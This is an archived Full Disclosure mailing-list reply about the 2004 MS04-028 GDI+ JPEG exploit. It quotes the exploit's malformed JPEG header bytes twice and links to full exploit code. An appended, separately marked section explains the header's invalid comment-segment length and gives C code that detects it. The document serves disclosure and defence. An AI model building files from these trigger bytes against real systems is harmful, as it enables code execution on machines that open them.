Full Disclosure mailing list archives
Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 25 Sep 2004 11:05:50 -0700
umm, no
all this has that's different is correct headers for bind or remote shell option. and ability to set ports and return ip in the code, instead of needing to use your own shellcode ( or Metasploit's )

note: there is no new exploit code or vector

------------------- / snip /-----------------
new.
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------
old.
------------------- / snip /-----------------
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------

take your media hype and die

kthnx,
m.wood
the last step before the worm http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
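Both copies of header1 quoted above contain \xFF\xFE\x00\x01, a JPEG comment (COM) segment whose length field is 1, below the minimum of 2 that the field's own two bytes require. The C code below is an added example, not code from the thread or from the exploit: it walks a buffer's marker segments and reports the first one with such an undersized length, which lets a gateway or file scanner flag files built on this header whatever payload follows. The function name and both sample buffers are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed samples (not from the thread): SOI, a JFIF APP0 segment, then
 * a COM segment with length 1 (bad) or length 4 followed by EOI (ok). */
static const uint8_t sample_bad[] = {
    0xFF,0xD8, 0xFF,0xE0,0x00,0x10, 'J','F','I','F',0x00,0x01,0x02,0x00,
    0x00,0x64,0x00,0x64,0x00,0x00, 0xFF,0xFE,0x00,0x01, 0x00,0x14 };
static const uint8_t sample_ok[] = {
    0xFF,0xD8, 0xFF,0xE0,0x00,0x10, 'J','F','I','F',0x00,0x01,0x02,0x00,
    0x00,0x64,0x00,0x64,0x00,0x00, 0xFF,0xFE,0x00,0x04,'o','k', 0xFF,0xD9 };

/* Hypothetical helper: returns the offset of the first marker segment whose
 * 16-bit big-endian length is below 2, -1 if none is found before the scan
 * data or the end of the buffer, -2 if the buffer does not start with SOI. */
long find_bad_segment(const uint8_t *buf, size_t len)
{
    size_t i = 2;
    if (len < 4 || buf[0] != 0xFF || buf[1] != 0xD8)
        return -2;
    while (i + 4 <= len) {
        if (buf[i] != 0xFF)
            return -1;                        /* lost marker sync: stop */
        uint8_t m = buf[i + 1];
        if (m == 0xFF) { i++; continue; }     /* fill byte before a marker */
        if (m == 0xD9 || m == 0xDA)
            return -1;                        /* EOI or start of scan data */
        if (m == 0x01 || (m >= 0xD0 && m <= 0xD7)) {
            i += 2;                           /* markers with no length field */
            continue;
        }
        size_t seglen = ((size_t)buf[i + 2] << 8) | buf[i + 3];
        if (seglen < 2)
            return (long)i;                   /* length cannot cover itself */
        i += 2 + seglen;                      /* skip marker plus segment */
    }
    return -1;
}

int main(void)
{
    printf("bad sample: %ld\n", find_bad_segment(sample_bad, sizeof sample_bad));
    printf("ok sample:  %ld\n", find_bad_segment(sample_ok, sizeof sample_ok));
    return 0;
}
```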